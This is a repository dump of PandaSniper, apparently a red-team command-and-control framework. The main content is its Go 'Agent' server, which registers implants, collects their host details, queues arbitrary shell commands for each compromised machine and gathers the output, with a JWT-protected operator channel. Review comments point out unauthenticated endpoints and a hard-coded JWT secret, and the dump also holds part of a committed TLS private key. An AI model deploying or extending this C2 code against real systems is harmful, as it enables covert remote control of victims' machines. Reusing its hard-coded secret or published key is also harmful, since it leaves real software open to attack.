├── .gitignore ├── 1.png ├── Agent ├── Agent.go ├── ca.key └── ca.pem ├── Implant ├── .DS_Store └── main.cpp ├── LICENSE ├── Master ├── PandaSniper.sln └── PandaSniper │ ├── AddListener.xaml │ ├── AddListener.xaml.cs │ ├── App.config │ ├── App.xaml │ ├── App.xaml.cs │ ├── DataFormat.cs │ ├── DoubleBufferListView.cs │ ├── Function.cs │ ├── LinuxExecutable.xaml │ ├── LinuxExecutable.xaml.cs │ ├── LinuxExecutableS.xaml │ ├── LinuxExecutableS.xaml.cs │ ├── ListenersListView.cs │ ├── LoginWindow.xaml │ ├── LoginWindow.xaml.cs │ ├── MainPage.xaml │ ├── MainPage.xaml.cs │ ├── MainPayload.xaml │ ├── MainPayload.xaml.cs │ ├── MainSetting.xaml │ ├── MainSetting.xaml.cs │ ├── MainWindow.xaml │ ├── MainWindow.xaml.cs │ ├── Md5.cs │ ├── Packages.xaml │ ├── Packages.xaml.cs │ ├── PandaSniper.csproj │ ├── PandaSniper.csproj.user │ ├── PayloadGeneragor.xaml │ ├── PayloadGeneragor.xaml.cs │ ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings │ ├── SpearPhish.xaml │ ├── SpearPhish.xaml.cs │ ├── SslTcpClient.cs │ ├── TargetListView.cs │ ├── WebDriveBy.xaml │ ├── WebDriveBy.xaml.cs │ ├── l.ico │ ├── l.png │ └── packages.config └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | /Master/.vs/PandaSniper/v16 2 | /Master/packages 3 | /Master/PandaSniper/bin/Debug 4 | /Master/PandaSniper/bin/Release 5 | /Master/PandaSniper/obj/Debug 6 | /Master/PandaSniper/obj/Release 7 | .DS_Store 8 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/1.png -------------------------------------------------------------------------------- /Agent/Agent.go: -------------------------------------------------------------------------------- 1 | package main 
/*
Agent -> Implant

/status{ // carries information, json {"uid":"1234564","data":"{\"ip\":\"127.0.0.2\",\"hostname\":\"centos\",\"user\":\"www\"}"}
	0: /info submit host information, json {"uid":"1234564","data":"{\"ip\":\"127.0.0.2\",\"hostname\":\"centos\",\"user\":\"www\"}"}
	1: /cmd fetch the command, cmd(string)
	   /cmdResult submit the command output, json {"uid":"1234561","data":"{\"status\":2,\"cmd\":\"whoami\",\"result\":\"www\"}"}
	-1: keep the heartbeat connection alive
}

Review notes, taken from the handlers defined later in this file:
  - httpServer registers /status, /cmdResult, /cmd, /info and /byebye on a
    plain net/http server started with ListenAndServe (no TLS on this side).
  - /status answers with the bare body 0, 1 or -1; these paths and bodies are
    stable network observables for unmodified builds.
  - getInfo also reads the top-level keys "ip" and "inner_ip", and getResult
    reads a top-level "result", which the samples above do not show.
  - Only /byebye checks a credential (its "hash" field against PassHash); the
    other four handlers perform no authentication in the visible code.
*/
import (
	"context"
	"crypto/md5"
	"crypto/rand"
	"crypto/tls"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"log"
	"net"
	"net/http"
	"os"
	"os/signal"
	"strconv"
	"strings"
	"time"

	"github.com/bitly/go-simplejson"
	// NOTE(review): this module is archived upstream; github.com/golang-jwt/jwt
	// is the maintained fork.
	"github.com/dgrijalva/jwt-go"
	"github.com/urfave/cli"
)

// Package-level state. It is touched both by the net/http handlers and by the
// per-connection goroutines started in listener(); the import list above has
// no sync package, so none of these accesses is guarded by a lock.
var (
	ok      bool   // scratch flag; start() assigns it without declaring a local
	port    string // TCP port of the TLS listener opened in listener()
	intPort int    // port value received from the command-line flag
	// PassHash is the MD5 hex digest of the pass flag (main sets it with MD5(pass)).
	// NOTE(review): auth() and sayBye() compare a client-supplied string with
	// this value using ==, so the digest itself is what a client presents.
	PassHash string
	pass     string // password received from the command-line flag
	ExecId   string // command ID; start() stores the ID of the command it selected
	ExecCmd  string // command text selected by start(); putCmd writes it back as-is
	// ImplanTotal is described as the online controlled hosts; it is not
	// referenced anywhere else in the visible source.
	ImplanTotal string
	// ImplanInfo collects the machine information of the controlled hosts, keyed by uid.
	ImplanInfo = make(map[string]ImplanStruct)
	// ListenerMap tracks HTTP listener start/stop state, keyed by the port string.
	ListenerMap = make(map[string]ListenerStruct)
	server      *http.Server // the HTTP server most recently created by httpServer()
	// ExecAll is the command queue: uid -> exec ID -> queued command.
	ExecAll = make(map[string]map[string]ExecallStruct)
	// ExecOne is described as a single command; it is not referenced anywhere
	// else in the visible source.
	ExecOne = make(map[string]ExecallStruct)
	// ExecMap stores command output, keyed by exec ID.
	ExecMap = make(map[string]string)
)

// Global JWT key: Login signs tokens with it (HS256) and Token hands it to
// jwt.Parse for verification.
// NOTE(review): hard-coded, source-published secret. Every build made from
// this file shares it, so a valid signature says nothing about who issued
// the token.
const (
	SecretKey = "This IS a Lo3g S4cr4^K4$y"
)

// ListenerStruct records the start/stop state of one HTTP listener.
type ListenerStruct struct {
	Status  bool   // whether the listener started successfully
	Err     string // populated when Errbool is true
	Errbool bool   // true when an error exists; normally false
}

// ResStruct is the response structure returned to the operator client.
type ResStruct struct {
	Code   int    `json:"code"`   // 200 ok, 500 internal error, 401 authentication error
	Result string `json:"result"` // execution result
	Error  string `json:"error"`  // error result
}

// ImplanStruct is the initialization struct.
type
ImplanStruct struct { 82 | Hostname string `json:"hostname"` 83 | IP string `json:"ip"` 84 | InnerIP string `json:"inner_ip"` 85 | User string `json:"user"` 86 | Time string 87 | PID string `json:"pid"` 88 | Cpuinfo string `json:"cpuinfo"` 89 | Osinfo string `json:"osinfo"` 90 | Sleeptime string `json:"sleep_time"` 91 | Country string `json:"country"` 92 | } 93 | 94 | //ExecallStruct for all 95 | type ExecallStruct struct { 96 | Cmd string 97 | Time int64 98 | } 99 | 100 | // json 转 struct 101 | func j2sInfo(JSONStr string) ImplanStruct { 102 | var struc ImplanStruct 103 | json.Unmarshal([]byte(JSONStr), &struc) 104 | return struc 105 | } 106 | 107 | //getDateTime for 获取时间戳 108 | func getDateTime() string { 109 | currentTime := time.Now().Unix() 110 | return strconv.FormatInt(currentTime, 10) 111 | 112 | } 113 | 114 | // 2Implant 115 | // http server 116 | func httpServer(httpport string) { 117 | 118 | var ok1 bool 119 | ListenerValue, ok1 := ListenerMap[httpport] 120 | if ok1 { 121 | 122 | ListenerValue.Errbool = true 123 | ListenerValue.Err = "端口已被使用" 124 | ListenerMap[httpport] = ListenerValue 125 | } else { 126 | quit := make(chan os.Signal) 127 | signal.Notify(quit, os.Interrupt) 128 | 129 | mux := http.NewServeMux() 130 | 131 | mux.HandleFunc("/status", start) 132 | mux.HandleFunc("/cmdResult", getResult) 133 | mux.HandleFunc("/cmd", putCmd) 134 | mux.HandleFunc("/info", getInfo) 135 | mux.HandleFunc("/byebye", sayBye) 136 | 137 | server = &http.Server{ 138 | Addr: ":" + httpport, 139 | WriteTimeout: time.Second * 4, 140 | Handler: mux, 141 | } 142 | 143 | go func() { 144 | // 接收退出信号 145 | <-quit 146 | if err := server.Close(); err != nil { 147 | fmt.Println(httpport + "已关闭") 148 | } 149 | }() 150 | 151 | //存储Listener数据 152 | ListenerValue.Status = true 153 | ListenerValue.Errbool = false 154 | ListenerMap[httpport] = ListenerValue 155 | 156 | err := server.ListenAndServe() 157 | if err != nil { 158 | // 正常退出 159 | if err == http.ErrServerClosed { 160 | 
fmt.Println(httpport + "已正常关闭") 161 | } else { 162 | fmt.Println(httpport+"已关闭:", err) 163 | ListenerValue.Errbool = true 164 | ListenerValue.Err = "开启http服务错误,请检查端口" 165 | ListenerValue.Status = false 166 | ListenerMap[httpport] = ListenerValue 167 | } 168 | } 169 | 170 | } 171 | 172 | } 173 | 174 | //开始 175 | func start(w http.ResponseWriter, r *http.Request) { 176 | 177 | //状态0 需要去存储信息 状态1 告知去取命令进行执行 状态-1保持连接 178 | //info if判断 uid是否是新 新就放到map里 179 | defer r.Body.Close() 180 | // 请求类型是application/json时从r.Body读取数据 181 | b, err := ioutil.ReadAll(r.Body) //获取访问信息 182 | if err != nil { 183 | fmt.Printf("read request.Body failed, err:%v\n", err) 184 | return 185 | } 186 | res, err := simplejson.NewJson([]byte(b)) 187 | if err != nil { 188 | fmt.Printf("解析json错误1, err:%v\n", err) 189 | return 190 | } 191 | firstUID, err := res.Get("uid").String() 192 | if err != nil { 193 | fmt.Printf("获取数据uid错误1, err:%v\n", err) 194 | return 195 | } 196 | 197 | _, ok = ImplanInfo[firstUID] 198 | if ok { 199 | ExecValue, ok := ExecAll[firstUID] 200 | 201 | if ok { //键值为空保持连接 202 | if len(ExecValue) == 0 { //循环出最小值传递 203 | w.Write([]byte(`-1`)) //保持连接 204 | //取出数据对时间戳进行修改进而判断在线implant 205 | InfoValue, _ := ImplanInfo[firstUID] 206 | InfoValue.Time = getDateTime() 207 | ImplanInfo[firstUID] = InfoValue 208 | 209 | } else { 210 | 211 | now, _ := strconv.ParseInt(getDateTime(), 10, 64) 212 | 213 | for execID, value := range ExecValue { 214 | if value.Time < now { 215 | now = value.Time 216 | ExecCmd = value.Cmd 217 | ExecId = execID 218 | } 219 | } 220 | w.Write([]byte(`1`)) //执行命令 221 | 222 | } 223 | } else { 224 | w.Write([]byte(`-1`)) //保持连接 225 | //取出数据对时间戳进行修改进而判断在线implant 226 | InfoValue, _ := ImplanInfo[firstUID] 227 | InfoValue.Time = getDateTime() 228 | ImplanInfo[firstUID] = InfoValue 229 | } 230 | } else { 231 | w.Write([]byte(`0`)) //存储受控端信息 232 | } 233 | 234 | } 235 | 236 | //存储信息 237 | func getInfo(w http.ResponseWriter, r *http.Request) { 238 | //处理post数据 239 | defer 
r.Body.Close() 240 | // 请求类型是application/json时从r.Body读取数据 241 | b, err := ioutil.ReadAll(r.Body) 242 | if err != nil { 243 | fmt.Printf("read request.Body failed, err:%v\n", err) 244 | return 245 | } 246 | res, err := simplejson.NewJson([]byte(b)) 247 | if err != nil { 248 | fmt.Printf("获取数据错误, err:%v\n", err) 249 | return 250 | } 251 | uid, err := res.Get("uid").String() 252 | if err != nil { 253 | fmt.Printf("获取数据错误, err:%v\n", err) 254 | return 255 | } 256 | jsondata, err := res.Get("data").String() 257 | if err != nil { 258 | fmt.Printf("获取数据错误, err:%v\n", err) 259 | return 260 | } 261 | ip, err := res.Get("ip").String() 262 | if err != nil { 263 | fmt.Printf("获取数据错误, err:%v\n", err) 264 | return 265 | } 266 | innerIP, err := res.Get("inner_ip").String() 267 | if err != nil { 268 | fmt.Printf("获取数据错误, err:%v\n", err) 269 | return 270 | } 271 | var structIP ImplanStruct 272 | structIP = j2sInfo(ip) 273 | var structData ImplanStruct 274 | structData = j2sInfo(jsondata) 275 | structData.Time = getDateTime() 276 | structData.IP = structIP.IP 277 | structData.Country = structIP.Country 278 | structData.InnerIP = innerIP 279 | ImplanInfo[uid] = structData 280 | 281 | } 282 | 283 | //发送命令 284 | func putCmd(w http.ResponseWriter, r *http.Request) { 285 | w.Write([]byte(ExecCmd)) 286 | } 287 | 288 | //获取命令回显 289 | func getResult(w http.ResponseWriter, r *http.Request) { 290 | //处理post数据 291 | defer r.Body.Close() 292 | // 请求类型是application/json时从r.Body读取数据 293 | c, err := ioutil.ReadAll(r.Body) 294 | if err != nil { 295 | fmt.Printf("read request.Body failed, err:%v\n", err) 296 | return 297 | } 298 | res, err := simplejson.NewJson([]byte(c)) 299 | if err != nil { 300 | fmt.Printf("获取数据错误, err:%v\n", err) 301 | return 302 | } 303 | uid, err := res.Get("uid").String() 304 | if err != nil { 305 | fmt.Printf("获取数据错误, err:%v\n", err) 306 | return 307 | } 308 | result, err := res.Get("result").String() 309 | if err != nil { 310 | fmt.Printf("获取数据错误, err:%v\n", err) 311 | 
return 312 | } 313 | ExecValue, ok := ExecAll[uid] 314 | fmt.Println("######ExecValue#####:", ExecValue) 315 | if ok { 316 | _, ok = ExecValue[ExecId] 317 | if ok { 318 | ExecMap[ExecId] = result 319 | delete(ExecAll[uid], ExecId) 320 | } else { 321 | fmt.Println("无此命令请求") 322 | } 323 | } else { 324 | w.Write([]byte(`"该用户尚未请求"`)) 325 | } 326 | } 327 | 328 | //关闭listener 329 | func sayBye(w http.ResponseWriter, r *http.Request) { 330 | //处理post数据 331 | defer r.Body.Close() 332 | // 请求类型是application/json时从r.Body读取数据 333 | b, err := ioutil.ReadAll(r.Body) 334 | if err != nil { 335 | fmt.Printf("read request.Body failed, err:%v\n", err) 336 | return 337 | } 338 | res, err := simplejson.NewJson([]byte(b)) 339 | if err != nil { 340 | fmt.Printf("获取数据错误, err:%v\n", err) 341 | return 342 | } 343 | hash, err := res.Get("hash").String() 344 | if err != nil { 345 | fmt.Printf("获取数据错误, err:%v\n", err) 346 | return 347 | } 348 | httpport, err := res.Get("port").String() 349 | if err != nil { 350 | fmt.Printf("获取数据错误, err:%v\n", err) 351 | return 352 | } 353 | if hash == PassHash { 354 | 355 | delete(ListenerMap, httpport) 356 | 357 | ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second) 358 | defer cancel() 359 | 360 | server.SetKeepAlivesEnabled(false) 361 | if err := server.Shutdown(ctx); err != nil { 362 | } 363 | 364 | } 365 | } 366 | 367 | //访问来关闭listener 368 | func exitListener(httpport string, hash string) { 369 | exitData := make(map[string]string) 370 | exitData["port"] = httpport 371 | exitData["hash"] = hash 372 | jsonBytes, err := json.Marshal(exitData) 373 | if err != nil { 374 | fmt.Println(err) 375 | } 376 | fmt.Printf("value: %v\n type:%T", string(jsonBytes), string(jsonBytes)) 377 | url := "http://127.0.0.1:" + httpport + "/byebye" 378 | // 表单数据 379 | // json 380 | contentType := "application/json" 381 | data := string(jsonBytes) 382 | resp, err := http.Post(url, contentType, strings.NewReader(data)) 383 | if err != nil { 384 | 
fmt.Println("post failed, err:\n", err) 385 | return 386 | } 387 | defer resp.Body.Close() 388 | _, err = ioutil.ReadAll(resp.Body) 389 | if err != nil { 390 | fmt.Println("get resp failed,err:\n", err) 391 | return 392 | } 393 | } 394 | 395 | //2master 396 | //listener tcp+tls 代码 397 | func listener() { 398 | crt, err := tls.LoadX509KeyPair("ca.pem", "ca.key") 399 | if err != nil { 400 | fmt.Println(err.Error()) 401 | } 402 | tlsConfig := &tls.Config{} 403 | tlsConfig.Certificates = []tls.Certificate{crt} 404 | tlsConfig.Time = time.Now 405 | tlsConfig.Rand = rand.Reader 406 | l, err := tls.Listen("tcp", ":"+port, tlsConfig) 407 | if err != nil { 408 | fmt.Println(err.Error()) 409 | } 410 | for { 411 | conn, err := l.Accept() 412 | if err != nil { 413 | fmt.Println(err.Error()) 414 | continue 415 | } else { 416 | go HandleClientConnect(conn) 417 | } 418 | } 419 | 420 | } 421 | 422 | //HandleClientConnect 每次接收数据的处理代码 暂时是循环接收发送,组合时修改为单次接收发送 423 | func HandleClientConnect(conn net.Conn) { 424 | defer conn.Close() 425 | fmt.Println("Receive Connect Request From ", conn.RemoteAddr().String()) 426 | buffer := make([]byte, 102400) 427 | for { 428 | len, err := conn.Read(buffer) 429 | if err != nil { 430 | fmt.Println(err.Error()) 431 | break 432 | } 433 | json_str := string(buffer[:len]) 434 | fmt.Printf("Receive Data: %s\n", json_str) 435 | result := dispatch(json_str) + "" 436 | fmt.Println(result) 437 | //发送给客户端 438 | _, err = conn.Write([]byte(result)) 439 | if err != nil { 440 | break 441 | } 442 | } 443 | fmt.Println("Client " + conn.RemoteAddr().String() + " Connection Closed.....") 444 | } 445 | 446 | // 指令处理 447 | func dispatch(json string) string { 448 | res, err := simplejson.NewJson([]byte(json)) 449 | if err != nil { 450 | Errorstr := "Json Error" 451 | ResJSON := ResultJSON(500, Errorstr, "") 452 | return ResJSON 453 | } else { 454 | typestr, err := res.Get("type").String() 455 | if err != nil { 456 | Errorstr := "Get type error" 457 | ResJSON := 
ResultJSON(500, Errorstr, "") 458 | return ResJSON 459 | } 460 | if typestr == "0" { 461 | username, err := res.Get("data").Get("user").String() 462 | if err != nil { 463 | Errorstr := "Get user error" 464 | ResJSON := ResultJSON(500, Errorstr, "") 465 | return ResJSON 466 | } 467 | hashstr, err := res.Get("data").Get("hash").String() 468 | if err != nil { 469 | Errorstr := "Get hash error" 470 | ResJSON := ResultJSON(500, Errorstr, "") 471 | return ResJSON 472 | } 473 | if hashstr != "" { 474 | ResJSON := Login(username, hashstr) 475 | return ResJSON 476 | } else { 477 | Errorstr := "Login Hash NULL" 478 | ResJSON := ResultJSON(500, Errorstr, "") 479 | return ResJSON 480 | } 481 | } else if typestr == "1" { 482 | tokenstr, err := res.Get("token").String() 483 | if err != nil { 484 | Errorstr := "Get token error" 485 | ResJSON := ResultJSON(500, Errorstr, "") 486 | return ResJSON 487 | } 488 | if Token(tokenstr) == true { 489 | ResJSON := GetImplant() 490 | return ResJSON 491 | } else { 492 | Errorstr := "Token Error" 493 | ResJSON := ResultJSON(401, Errorstr, "") 494 | return ResJSON 495 | } 496 | } else if typestr == "2" { 497 | tokenstr, err := res.Get("token").String() 498 | if err != nil { 499 | Errorstr := "Get token error" 500 | ResJSON := ResultJSON(500, Errorstr, "") 501 | return ResJSON 502 | } 503 | uid, err := res.Get("data").Get("uid").String() 504 | if err != nil { 505 | Errorstr := "Get uid error" 506 | ResJSON := ResultJSON(500, Errorstr, "") 507 | return ResJSON 508 | } 509 | cmd, err := res.Get("data").Get("cmd").String() 510 | if err != nil { 511 | Errorstr := "Get cmd error" 512 | ResJSON := ResultJSON(500, Errorstr, "") 513 | return ResJSON 514 | } 515 | if Token(tokenstr) == true { 516 | res := cmd2im(uid, cmd) 517 | return res 518 | } else { 519 | Errorstr := "Token Error" 520 | ResJSON := ResultJSON(401, Errorstr, "") 521 | return ResJSON 522 | } 523 | } else if typestr == "3" { 524 | tokenstr, err := res.Get("token").String() 525 | if err 
!= nil { 526 | Errorstr := "Get token error" 527 | ResJSON := ResultJSON(500, Errorstr, "") 528 | return ResJSON 529 | } 530 | httpport, err := res.Get("data").Get("port").String() 531 | if err != nil { 532 | Errorstr := "Get port error" 533 | ResJSON := ResultJSON(500, Errorstr, "") 534 | return ResJSON 535 | } 536 | int, err := strconv.Atoi(httpport) 537 | if err != nil { 538 | Errorstr := "Port error" 539 | ResJSON := ResultJSON(500, Errorstr, "") 540 | return ResJSON 541 | } 542 | fmt.Println("Int port:", int) 543 | if int > 1 && int <= 65535 { 544 | if Token(tokenstr) == true { 545 | go httpServer(httpport) 546 | Stime := time.Now() 547 | Utime := time.Since(Stime) 548 | for { 549 | valus, ok := ListenerMap[httpport] 550 | if ok { 551 | valuestruct := valus 552 | if valuestruct.Status && !valuestruct.Errbool { 553 | ResJSON := ResultJSON(200, "", "success") 554 | return ResJSON 555 | } else { 556 | ResJSON := ResultJSON(500, "Start http server error:"+valuestruct.Err, "") 557 | return ResJSON 558 | } 559 | } 560 | time.Sleep(500 * time.Millisecond) 561 | Utime = time.Since(Stime) 562 | if Utime.Seconds() >= 30.00 { 563 | Errorstr := "Time out! 
Start http server error" 564 | ResJSON := ResultJSON(500, Errorstr, "") 565 | return ResJSON 566 | } 567 | } 568 | } else { 569 | Errorstr := "Token Error" 570 | ResJSON := ResultJSON(401, Errorstr, "") 571 | return ResJSON 572 | } 573 | } else { 574 | Errorstr := "Port not in {1,65535}" 575 | ResJSON := ResultJSON(500, Errorstr, "") 576 | return ResJSON 577 | } 578 | } else if typestr == "4" { 579 | tokenstr, err := res.Get("token").String() 580 | if err != nil { 581 | Errorstr := "Get token error" 582 | ResJSON := ResultJSON(500, Errorstr, "") 583 | return ResJSON 584 | } 585 | httpport, err := res.Get("data").Get("port").String() 586 | if err != nil { 587 | Errorstr := "Get port error" 588 | ResJSON := ResultJSON(500, Errorstr, "") 589 | return ResJSON 590 | } 591 | int, err := strconv.Atoi(httpport) 592 | if err != nil { 593 | Errorstr := "Port error" 594 | ResJSON := ResultJSON(500, Errorstr, "") 595 | return ResJSON 596 | } 597 | fmt.Println("Int port:", int) 598 | if int > 1 && int <= 65535 { 599 | if Token(tokenstr) == true { 600 | valus, ok := ListenerMap[httpport] 601 | if ok { 602 | valuestruct := valus 603 | if valuestruct.Status { 604 | exitListener(httpport, PassHash) 605 | ResJSON := ResultJSON(200, "", "success") 606 | return ResJSON 607 | } else { 608 | ResJSON := ResultJSON(500, "Start http server error:"+valuestruct.Err, "") 609 | return ResJSON 610 | } 611 | } else { 612 | ResJSON := ResultJSON(500, "Listener not exist", "") 613 | return ResJSON 614 | } 615 | } else { 616 | Errorstr := "Token Error" 617 | ResJSON := ResultJSON(401, Errorstr, "") 618 | return ResJSON 619 | } 620 | } else { 621 | Errorstr := "Port not in {1,65535}" 622 | ResJSON := ResultJSON(500, Errorstr, "") 623 | return ResJSON 624 | } 625 | } else if typestr == "5" { 626 | tokenstr, err := res.Get("token").String() 627 | if err != nil { 628 | Errorstr := "Get token error" 629 | ResJSON := ResultJSON(500, Errorstr, "") 630 | return ResJSON 631 | } 632 | uid, err := 
res.Get("data").Get("uid").String() 633 | if err != nil { 634 | Errorstr := "Get uid error" 635 | ResJSON := ResultJSON(500, Errorstr, "") 636 | return ResJSON 637 | } 638 | cmd, err := res.Get("data").Get("execid").String() 639 | if err != nil { 640 | Errorstr := "Get execid error" 641 | ResJSON := ResultJSON(500, Errorstr, "") 642 | return ResJSON 643 | } 644 | if Token(tokenstr) == true { 645 | res := GetExec(uid, cmd) 646 | return res 647 | } else { 648 | Errorstr := "Token Error" 649 | ResJSON := ResultJSON(401, Errorstr, "") 650 | return ResJSON 651 | } 652 | } else if typestr == "6" { 653 | tokenstr, err := res.Get("token").String() 654 | if err != nil { 655 | Errorstr := "Get token error" 656 | ResJSON := ResultJSON(500, Errorstr, "") 657 | return ResJSON 658 | } 659 | if Token(tokenstr) == true { 660 | ResJSON := GetListener() 661 | return ResJSON 662 | } else { 663 | Errorstr := "Token Error" 664 | ResJSON := ResultJSON(401, Errorstr, "") 665 | return ResJSON 666 | } 667 | } else { 668 | Errorstr := "Type Error,Please check it" 669 | ResJSON := ResultJSON(500, Errorstr, "") 670 | return ResJSON 671 | } 672 | } 673 | } 674 | 675 | // Login 函数 676 | func Login(username string, hash string) string { 677 | if auth(hash) { 678 | token := jwt.New(jwt.SigningMethodHS256) 679 | claims := make(jwt.MapClaims) 680 | claims["user"] = username 681 | claims["exp"] = time.Now().Add(time.Hour * time.Duration(12)).Unix() 682 | claims["iat"] = time.Now().Unix() 683 | token.Claims = claims 684 | 685 | tokenString, err := token.SignedString([]byte(SecretKey)) 686 | if err != nil { 687 | Errorstr := "Error while signing the token" 688 | ResJSON := ResultJSON(500, Errorstr, "") 689 | return ResJSON 690 | } 691 | ResJSON := ResultJSON(200, "", tokenString) 692 | return ResJSON 693 | } else { 694 | Resstr := "Passwd Error" 695 | ResJSON := ResultJSON(401, "", Resstr) 696 | return ResJSON 697 | } 698 | } 699 | 700 | // Token校验,用来判断是否可以调用具体的功能 701 | func Token(token string) bool { 
702 | _, err := jwt.Parse(token, func(*jwt.Token) (interface{}, error) { 703 | return []byte(SecretKey), nil 704 | }) 705 | if err != nil { 706 | fmt.Println("parase with claims failed.", err) 707 | return false 708 | } 709 | return true 710 | } 711 | 712 | //auth权限校验 利用密码的hash校验 713 | func auth(pwd string) bool { 714 | if pwd == PassHash { 715 | return true 716 | } 717 | return false 718 | } 719 | 720 | //MD5 生成32位MD5 721 | func MD5(text string) string { 722 | ctx := md5.New() 723 | ctx.Write([]byte(text)) 724 | return hex.EncodeToString(ctx.Sum(nil)) 725 | } 726 | 727 | //cmd2im 处理执行命令json 728 | func cmd2im(uid string, cmd string) string { 729 | _, status := ImplanInfo[uid] 730 | // 对接时候需要考虑implant存活问题,需要在ImplaInfo 里面设置time来判断,心跳时间到对接再来商量 731 | // 判断是否存在对应 uid 的implant,如果存在,需要查询对应的命令执行map是否存在该uid 没有则创建 732 | if !status { 733 | return ResultJSON(500, "No implant!,Please Check", "") 734 | } else { 735 | StructValue := ExecallStruct{} 736 | //添加一个延迟,防止master批量执行,产生一样的execid 737 | time.Sleep(10 * time.Millisecond) 738 | StructValue.Time = time.Now().Unix() 739 | StructValue.Cmd = cmd 740 | execid := MD5(uid + strconv.FormatInt(time.Now().UnixNano(), 10)) 741 | //ExecOne 单条命令 742 | ExecOneMap := make(map[string]ExecallStruct) 743 | //如果ExecAll 里面不存在uid 对应map(第一次执行命令),先赋值空 744 | _, ok := ExecAll[uid] 745 | if !ok { 746 | ExecAll[uid] = ExecOneMap 747 | } 748 | ExecOneMap = ExecAll[uid] 749 | ExecOneMap[execid] = StructValue 750 | ExecAll[uid] = ExecOneMap 751 | fmt.Println(ExecAll) 752 | return ResultJSON(200, "", execid) 753 | } 754 | } 755 | 756 | // GetExec 757 | func GetExec(uid string, execid string) string { 758 | ResultStr, status := ExecMap[execid] 759 | if status { 760 | return ResultJSON(200, "", ResultStr) 761 | } else { 762 | value, ok := ExecAll[uid] 763 | if ok { 764 | _, execstatus := value[execid] 765 | if execstatus { 766 | return ResultJSON(400, "", "Wait for exec") 767 | } else { 768 | return ResultJSON(404, "execid not in ExecAllMap", "") 769 | } 
770 | } else { 771 | return ResultJSON(500, "uid error", "") 772 | } 773 | } 774 | } 775 | 776 | //ResultJSON 封装返回数据 777 | func ResultJSON(code int, errstr string, resustr string) string { 778 | ResStru := ResStruct{} 779 | ResStru.Code = code 780 | ResStru.Error = errstr 781 | ResStru.Result = resustr 782 | jsonBytes, err := json.Marshal(ResStru) 783 | if err != nil { 784 | fmt.Println(err) 785 | } 786 | return string(jsonBytes) 787 | } 788 | 789 | //GetImplant 返回所有在线主机 790 | func GetImplant() string { 791 | var m map[string]interface{} 792 | var s []map[string]interface{} 793 | for key, value := range ImplanInfo { 794 | m = make(map[string]interface{}) 795 | InfoStruct := value 796 | m["uid"] = key 797 | m["hostname"] = InfoStruct.Hostname 798 | m["ip"] = InfoStruct.IP 799 | m["innerip"] = InfoStruct.InnerIP 800 | m["user"] = InfoStruct.User 801 | m["time"] = InfoStruct.Time 802 | m["pid"] = InfoStruct.PID 803 | m["cpuinfo"] = InfoStruct.Cpuinfo 804 | m["osinfo"] = InfoStruct.Osinfo 805 | m["sleeptime"] = InfoStruct.Sleeptime 806 | m["country"] = InfoStruct.Country 807 | s = append(s, m) 808 | } 809 | var Res map[string]interface{} 810 | Res = make(map[string]interface{}) 811 | Res["code"] = "200" 812 | Res["result"] = s 813 | Res["error"] = "" 814 | ResJSON, err := json.Marshal(Res) 815 | if err != nil { 816 | Errorstr := "Get Implant error" 817 | ResJSON := ResultJSON(500, Errorstr, "") 818 | return ResJSON 819 | } else { 820 | return string(ResJSON) 821 | } 822 | } 823 | 824 | //GetListener 825 | func GetListener() string { 826 | var m map[string]interface{} 827 | var s []map[string]interface{} 828 | for key, value := range ListenerMap { 829 | m = make(map[string]interface{}) 830 | InfoStruct := value 831 | m["port"] = key 832 | m["status"] = InfoStruct.Status 833 | s = append(s, m) 834 | } 835 | var Res map[string]interface{} 836 | Res = make(map[string]interface{}) 837 | Res["code"] = "200" 838 | Res["result"] = s 839 | Res["error"] = "" 840 | ResJSON, err 
:= json.Marshal(Res) 841 | if err != nil { 842 | Errorstr := "Get Implant error" 843 | ResJSON := ResultJSON(500, Errorstr, "") 844 | return ResJSON 845 | } else { 846 | return string(ResJSON) 847 | } 848 | } 849 | 850 | func main() { 851 | app := cli.NewApp() 852 | app.Name = "Agent" 853 | app.Flags = []cli.Flag{ 854 | &cli.IntFlag{ 855 | Name: "port,p", 856 | Value: 0, 857 | Usage: "listening port", 858 | Destination: &intPort, 859 | }, &cli.StringFlag{ 860 | Name: "pass", 861 | Value: "", 862 | Usage: "password", 863 | Destination: &pass, 864 | }, 865 | } 866 | app.Action = func(c *cli.Context) error { 867 | 868 | if c.Int("port") < 1 || c.Int("port") > 65535 { 869 | return cli.NewExitError("invalid port,please -h", 2) 870 | } else if len(c.String("pass")) == 0 { 871 | return cli.NewExitError("invalid pass,please -h", 2) 872 | } else { 873 | port = strconv.Itoa(intPort) 874 | PassHash = MD5(pass) 875 | fmt.Println("test2-----start") 876 | listener() 877 | } 878 | return nil 879 | } 880 | err := app.Run(os.Args) 881 | if err != nil { 882 | log.Fatal(err) 883 | } 884 | } 885 | 886 | -------------------------------------------------------------------------------- /Agent/ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICXgIBAAKBgQDMgky6LDUZPZa1CmfDjnbyodXtkZWd9cG7V2zFoUl/qIGlx2VD 3 | e/UM98cYJTMQltEifwz2s+DqB/jgDs6yu8M+zcvtMcubQMi8xVTd5EFxw4lsjpMS 4 | h6CTLjUEY2uTYqMEN67WfdQf0kehmVzMYaYKKvM9ggXxPNJrVHiMDRKAjQIDAQAB 5 | AoGBAK7x/C766EV6UTT3/MHmWky/MqEy/DmPZTYc2JjLm3NQM/Ab/b1YCc4ZHEDE 6 | ecWELs2CwBU+1XV+cmFBaYKuapsEtgsUOhTcIEyT35iq6Icnio+WetSKnJNBIyTg 7 | LPTZxDkHSLqX4AMGHXZtM/nRM1buOSoiO/ckPTXVjLDvhByFAkEA4rHzjCmBVgju 8 | zhuHrevVGYVJwB/zmxpNhVBkPan56J2ZdVK20XtsimHBg/TcCRbbPGDbxC+RJNWw 9 | zIA+0IcIewJBAObyI8rqjwqaW5V6JfLk2zL86VgTaBsZotYTH8KaxIUP5vSZbBQG 10 | o9Pz+TtRbndSWuvG3E22L5SasdCvi3XdgJcCQQCmhm4P0hVuK9WwlcyPWCQMQTsx 11 | 
